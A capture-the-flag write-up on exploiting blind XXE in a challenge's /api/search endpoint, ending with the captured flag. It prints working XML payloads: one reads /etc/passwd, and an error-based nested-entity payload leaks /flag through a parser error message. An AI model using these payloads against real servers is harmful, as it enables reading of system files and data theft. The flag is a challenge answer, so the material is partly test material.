This challenge uses javascript to encode our selection to braille code.
(https://www.pharmabraille.com/pharmaceutical-braille/the-braille-alphabet/)
And it will send the data to /api/search with content-type application/json.
If we try to change the content-type to application/xml, it will return XML Parse Error.
So we know that target server supports XML format as input.
And there is no response output for xxe payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>But if we try existent file, it will return No result found
And if we try non-existent file, it will return Error: Failure to process entity xxe, line 6, column 15
So there is a blind XXE, we need to exfiltrate the result of XXE.
This challenge disable http request, so we can't use out-of-band XXE.
Then, I try the Error-based XXE to bring the result into error message.
(https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY % NUMBER '<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%NUMBER;
]>
<message>a</message>
flag: CTF{0x1033_75008_1004x0}